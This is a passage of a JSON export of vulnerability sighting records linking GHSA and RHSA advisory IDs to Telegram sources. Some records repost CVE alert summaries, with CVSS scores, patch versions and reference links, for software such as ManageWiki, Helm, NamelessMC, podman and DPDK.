"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FG9M-J9X8-8279", "type": "seen", "source": "Telegram/Hv7piurWFmTJB7c7iHri9T0M-meMIfk5qPkk7ikOJpSuKtA", "content": "", "creation_timestamp": "2026-01-07T23:09:50.000000Z"}, {"uuid": "c8fe2372-a6bd-461d-aa58-769aba881746", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-859X-46H8-VCRV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13346", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-43861\n\ud83d\udd25 CVSS Score: 4.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: ManageWiki is a MediaWiki extension allowing users to manage wikis. Prior to commit 2f177dc, ManageWiki is vulnerable to reflected or stored XSS in the review dialog. A logged-in attacker must change a form field to include a malicious payload. If that same user then opens the \"Review Changes\" dialog, the payload will be rendered and executed in the context of their own session. This issue has been patched in commit 2f177dc.\n\ud83d\udccf Published: 2025-04-24T20:49:57.692Z\n\ud83d\udccf Modified: 2025-04-24T20:49:57.692Z\n\ud83d\udd17 References:\n1. https://github.com/miraheze/ManageWiki/security/advisories/GHSA-859x-46h8-vcrv\n2. https://github.com/miraheze/ManageWiki/commit/2f177dc83b28b727613215b835d4036cb179e4ab", "creation_timestamp": "2025-04-24T21:07:11.000000Z"}, {"uuid": "05114da1-b7b2-4853-92e1-81d85c497803", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F2WP-J3FR-938W", "type": "seen", "source": "Telegram/Hv7piurWFmTJB7c7iHri9T0M-meMIfk5qPkk7ikOJpSuKtA", "content": "", "creation_timestamp": "2026-01-07T23:09:50.000000Z"}, {"uuid": "f5e3e017-aa15-4104-9827-31635f7d8441", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7662-MF46-WR88", "type": "published-proof-of-concept", "source": "Telegram/0oJDwAhtc18DERwb9VjD5vzlW29jjr74xBieCo4YDk1jmcA", "content": "", "creation_timestamp": "2026-01-07T23:10:30.000000Z"}, {"uuid": "b04dbb68-471a-4d56-a6fe-0e7c5703836e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C3XR-6687-5C8P", "type": "seen", "source": "Telegram/Hv7piurWFmTJB7c7iHri9T0M-meMIfk5qPkk7ikOJpSuKtA", "content": "", "creation_timestamp": "2026-01-07T23:09:50.000000Z"}, {"uuid": "9daecbe0-4a49-42a4-b9bc-d549d2a19e1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38JV-5279-WG99", "type": "seen", "source": "Telegram/Hv7piurWFmTJB7c7iHri9T0M-meMIfk5qPkk7ikOJpSuKtA", "content": "", "creation_timestamp": "2026-01-07T23:09:50.000000Z"}, {"uuid": "483891ee-bbc5-4bc4-86cd-2698eec8ab90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-792Q-CQQ9-MQ4X", "type": "seen", "source": "Telegram/Hv7piurWFmTJB7c7iHri9T0M-meMIfk5qPkk7ikOJpSuKtA", "content": "", "creation_timestamp": "2026-01-07T23:09:50.000000Z"}, {"uuid": "27cb895a-3556-44fd-9db6-83d834505de1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2F26-VH48-38G6", "type": "published-proof-of-concept", "source": "Telegram/2JvedLLs2h42jDOpZBWHAKvZn_ZL811K1YWZLSfKhihcdHY", "content": "", "creation_timestamp": "2026-01-07T23:10:04.000000Z"}, {"uuid": "27e4be33-d56c-4545-9691-1a9a999a2cb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PRMM-G479-4FV7", "type": "published-proof-of-concept", "source": "Telegram/2JvedLLs2h42jDOpZBWHAKvZn_ZL811K1YWZLSfKhihcdHY", "content": "", "creation_timestamp": "2026-01-07T23:10:04.000000Z"}, {"uuid": "b5efd3fc-b3ea-449a-a5a3-91f593f28622", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5RQC-W93Q-589M", "type": "published-proof-of-concept", "source": "Telegram/2JvedLLs2h42jDOpZBWHAKvZn_ZL811K1YWZLSfKhihcdHY", "content": "", "creation_timestamp": "2026-01-07T23:10:04.000000Z"}, {"uuid": "3eb4aa1b-80e9-477b-806e-3923bb3bfa62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3R2X-J7V3-PG6F", "type": "published-proof-of-concept", "source": "Telegram/2JvedLLs2h42jDOpZBWHAKvZn_ZL811K1YWZLSfKhihcdHY", "content": "", "creation_timestamp": "2026-01-07T23:10:04.000000Z"}, {"uuid": "eb1eadb1-2906-443d-a9f2-1d7e3e8e9599", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22Q7-8347-79M5", "type": "published-proof-of-concept", "source": "Telegram/0oJDwAhtc18DERwb9VjD5vzlW29jjr74xBieCo4YDk1jmcA", "content": "", "creation_timestamp": "2026-01-07T23:10:30.000000Z"}, {"uuid": "22274514-d434-4a91-b41e-f8f34bf2ea10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WXJP-H88G-7FQG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12303", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-41961\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: BigBlueButton is an open source web conferencing system. Versions prior to 2.4-rc-6 are subject to Ineffective user bans. The attacker could register multiple users, and join the meeting with one of them. When that user is banned, they could still join the meeting with the remaining registered users from the same extId. This issue has been fixed by improving permissions such that banning a user removes all users related to their extId, including registered users that have not joined the meeting. This issue is patched in versions 2.4-rc-6 and 2.5-alpha-1. There are no workarounds. \n\ud83d\udccf Published: 2022-12-16T12:24:43.465Z\n\ud83d\udccf Modified: 2025-04-17T17:24:47.412Z\n\ud83d\udd17 References:\n1. https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-wxjp-h88g-7fqg\n2. https://github.com/bigbluebutton/bigbluebutton/releases/tag/v2.4-rc-6\n3. https://github.com/bigbluebutton/bigbluebutton/releases/tag/v2.5-alpha-1", "creation_timestamp": "2025-04-17T17:57:38.000000Z"}, {"uuid": "fa5d7c3d-05b9-48de-82bb-f7658a54dc6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53C4-HHMH-VW5Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12495", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23525\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: Helm is a tool for managing Charts, pre-configured Kubernetes resources. Versions prior to 3.10.3 are subject to NULL Pointer Dereference in the _repo_package. The _repo_ package contains a handler that processes the index file of a repository. For example, the Helm client adds references to chart repositories where charts are managed. The _repo_ package parses the index file of the repository and loads it into structures Go can work with. Some index files can cause array data structures to be created causing a memory violation. Applications that use the _repo_ package in the Helm SDK to parse an index file can suffer a Denial of Service when that input causes a panic that cannot be recovered from. The Helm Client will panic with an index file that causes a memory violation panic. Helm is not a long running service so the panic will not affect future uses of the Helm client. This issue has been patched in 3.10.3. SDK users can validate index files that are correctly formatted before passing them to the _repo_ functions.\n\ud83d\udccf Published: 2022-12-15T00:38:09.873Z\n\ud83d\udccf Modified: 2025-04-18T15:58:58.833Z\n\ud83d\udd17 References:\n1. https://github.com/helm/helm/security/advisories/GHSA-53c4-hhmh-vw5q\n2. https://github.com/helm/helm/commit/638ebffbc2e445156f3978f02fd83d9af1e56f5b", "creation_timestamp": "2025-04-18T16:59:11.000000Z"}, {"uuid": "0cb1109f-4a94-4d39-b831-17beb5e5908d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JHVP-MWJ4-922M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12465", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31118\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H)\n\ud83d\udd39 Description: NamelessMC is a free, easy to use &amp; powerful website software for Minecraft servers. In version 2.1.4 and prior, forum quick reply feature (view_topic.php) does not implement any spam prevention mechanism. This allows authenticated users to continuously post replies without any time restriction, resulting in an uncontrolled surge of posts that can disrupt normal operations. This issue has been patched in version 2.2.0.\n\ud83d\udccf Published: 2025-04-18T15:52:36.923Z\n\ud83d\udccf Modified: 2025-04-18T15:52:36.923Z\n\ud83d\udd17 References:\n1. https://github.com/NamelessMC/Nameless/security/advisories/GHSA-jhvp-mwj4-922m\n2. https://github.com/NamelessMC/Nameless/commit/51e9d93aaa28d40f060b807533d22b768abea207\n3. https://github.com/NamelessMC/Nameless/releases/tag/v2.2.0", "creation_timestamp": "2025-04-18T15:58:45.000000Z"}, {"uuid": "e303c8da-1503-4dd2-8294-1d42962e59a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HRQ-RF96-C2JM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12468", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29784\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: NamelessMC is a free, easy to use &amp; powerful website software for Minecraft servers. In version 2.1.4 and prior, the s parameter in GET requests for forum search functionality lacks length validation, allowing attackers to submit excessively long search queries. This oversight can lead to performance degradation and potential denial-of-service (DoS) attacks. This issue has been patched in version 2.2.0.\n\ud83d\udccf Published: 2025-04-18T15:50:17.656Z\n\ud83d\udccf Modified: 2025-04-18T15:50:17.656Z\n\ud83d\udd17 References:\n1. https://github.com/NamelessMC/Nameless/security/advisories/GHSA-4hrq-rf96-c2jm\n2. https://github.com/NamelessMC/Nameless/commit/f5341e56930a98978171e0a871d60f19ab30ebdd\n3. https://github.com/NamelessMC/Nameless/releases/tag/v2.2.0", "creation_timestamp": "2025-04-18T15:58:47.000000Z"}, {"uuid": "bd2e17bf-b8f0-43e4-9307-d63d8da0522f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2454", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "f63902a8-7873-4f43-81bb-1379dfc71dcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1713", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "20fed196-68f2-4bd0-8da0-6f4e68e9c36a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0211", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12175", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-04-17T00:31:34.768Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/errata/RHSA-2025:3963\n9. https://access.redhat.com/errata/RHSA-2025:3964\n10. https://access.redhat.com/errata/RHSA-2025:3965\n11. https://access.redhat.com/errata/RHSA-2025:3970\n12. https://access.redhat.com/security/cve/CVE-2024-11614\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-04-17T00:59:45.000000Z"}, {"uuid": "1f134163-2815-4b98-a9db-8e2eb8d43a9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3964", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12175", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_0, Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-04-17T00:31:34.768Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0211\n5. https://access.redhat.com/errata/RHSA-2025:0220\n6. https://access.redhat.com/errata/RHSA-2025:0221\n7. https://access.redhat.com/errata/RHSA-2025:0222\n8. https://access.redhat.com/errata/RHSA-2025:3963\n9. https://access.redhat.com/errata/RHSA-2025:3964\n10. https://access.redhat.com/errata/RHSA-2025:3965\n11. https://access.redhat.com/errata/RHSA-2025:3970\n12. https://access.redhat.com/security/cve/CVE-2024-11614\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-04-17T00:59:45.000000Z"}, {"uuid": "87821eb5-c522-49b9-856f-b14d479bd698", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7V4Q-MHR2-HJ7R", "type": "published-proof-of-concept", "source": "Telegram/0oJDwAhtc18DERwb9VjD5vzlW29jjr74xBieCo4YDk1jmcA", "content": "", "creation_timestamp": "2026-01-07T23:10:30.000000Z"}, {"uuid": "0c843632-5538-4409-8a33-6d7dc51b1326", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V3Q7-7HW6-6JQ8", "type": "published-proof-of-concept", "source": "Telegram/0oJDwAhtc18DERwb9VjD5vzlW29jjr74xBieCo4YDk1jmcA", "content": "", "creation_timestamp": "2026-01-07T23:10:30.000000Z"}, {"uuid": "6d3a5941-82ec-47b2-86f6-41ebf28aa949", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G925-F788-4JH7", "type": "published-proof-of-concept", "source": "Telegram/JTVCavw9eJ9TxCCdyOAXizVyk-oL-OSGJyunth0Lc0NQQjM", "content": "", "creation_timestamp": "2026-01-02T18:48:07.000000Z"}, {"uuid": "246d7a89-0845-41e8-80f1-34e4c5f4a327", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2PHV-J68V-WWQX", "type": "seen", "source": "Telegram/8hg5Gu2_QSQMEOVEXvwk_uKKrDJKBvTFN3ZFtq0-NHQh3Nk", "content": "", "creation_timestamp": "2026-01-08T00:04:16.000000Z"}, {"uuid": "25f3c065-11dc-4172-816c-8a3c09928a3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7112", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12340", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4641\n\ud83d\udd25 CVSS Score: 4.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in shadow-utils. When asking for a new password, shadow-utils asks the password twice. If the password fails on the second attempt, shadow-utils fails in cleaning the buffer used to store the first entry. This may allow an attacker with enough access to retrieve the password from the memory.\n\ud83d\udccf Published: 2023-12-27T15:43:22.929Z\n\ud83d\udccf Modified: 2025-04-17T20:33:22.477Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:6632\n2. https://access.redhat.com/errata/RHSA-2023:7112\n3. https://access.redhat.com/errata/RHSA-2024:0417\n4. https://access.redhat.com/errata/RHSA-2024:2577\n5. https://access.redhat.com/security/cve/CVE-2023-4641\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2215945", "creation_timestamp": "2025-04-17T20:58:04.000000Z"}, {"uuid": "2fdad7b2-b0c2-44f6-b89b-f7426bfe2e65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:6632", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12340", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4641\n\ud83d\udd25 CVSS Score: 4.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in shadow-utils. When asking for a new password, shadow-utils asks the password twice. If the password fails on the second attempt, shadow-utils fails in cleaning the buffer used to store the first entry. This may allow an attacker with enough access to retrieve the password from the memory.\n\ud83d\udccf Published: 2023-12-27T15:43:22.929Z\n\ud83d\udccf Modified: 2025-04-17T20:33:22.477Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:6632\n2. https://access.redhat.com/errata/RHSA-2023:7112\n3. https://access.redhat.com/errata/RHSA-2024:0417\n4. https://access.redhat.com/errata/RHSA-2024:2577\n5. https://access.redhat.com/security/cve/CVE-2023-4641\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2215945", "creation_timestamp": "2025-04-17T20:58:04.000000Z"}, {"uuid": "23189f50-6537-4217-8aa0-38fdbb721e0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2577", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12340", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4641\n\ud83d\udd25 CVSS Score: 4.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in shadow-utils. When asking for a new password, shadow-utils asks the password twice. If the password fails on the second attempt, shadow-utils fails in cleaning the buffer used to store the first entry. This may allow an attacker with enough access to retrieve the password from the memory.\n\ud83d\udccf Published: 2023-12-27T15:43:22.929Z\n\ud83d\udccf Modified: 2025-04-17T20:33:22.477Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:6632\n2. https://access.redhat.com/errata/RHSA-2023:7112\n3. https://access.redhat.com/errata/RHSA-2024:0417\n4. https://access.redhat.com/errata/RHSA-2024:2577\n5. https://access.redhat.com/security/cve/CVE-2023-4641\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2215945", "creation_timestamp": "2025-04-17T20:58:04.000000Z"}, {"uuid": "f02aa711-478e-4359-8721-f52fa2973516", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0417", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12340", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4641\n\ud83d\udd25 CVSS Score: 4.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in shadow-utils. When asking for a new password, shadow-utils asks the password twice. If the password fails on the second attempt, shadow-utils fails in cleaning the buffer used to store the first entry. This may allow an attacker with enough access to retrieve the password from the memory.\n\ud83d\udccf Published: 2023-12-27T15:43:22.929Z\n\ud83d\udccf Modified: 2025-04-17T20:33:22.477Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:6632\n2. https://access.redhat.com/errata/RHSA-2023:7112\n3. https://access.redhat.com/errata/RHSA-2024:0417\n4. https://access.redhat.com/errata/RHSA-2024:2577\n5. https://access.redhat.com/security/cve/CVE-2023-4641\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2215945", "creation_timestamp": "2025-04-17T20:58:04.000000Z"}, {"uuid": "e6382c98-808b-407a-a876-e467c6261145", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-824X-88XG-CWRV", "type": "seen", "source": "Telegram/8hg5Gu2_QSQMEOVEXvwk_uKKrDJKBvTFN3ZFtq0-NHQh3Nk", "content": "", "creation_timestamp": "2026-01-08T00:04:16.000000Z"}, {"uuid": "4a6178d3-ef13-4650-9dd1-f8c03ad3b5d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CMJ9-27WJ-7X47", "type": "seen", "source": "Telegram/8hg5Gu2_QSQMEOVEXvwk_uKKrDJKBvTFN3ZFtq0-NHQh3Nk", "content": "", "creation_timestamp": "2026-01-08T00:04:16.000000Z"}, {"uuid": "c0490ca4-9a79-4c8c-9087-24d27b46293d", 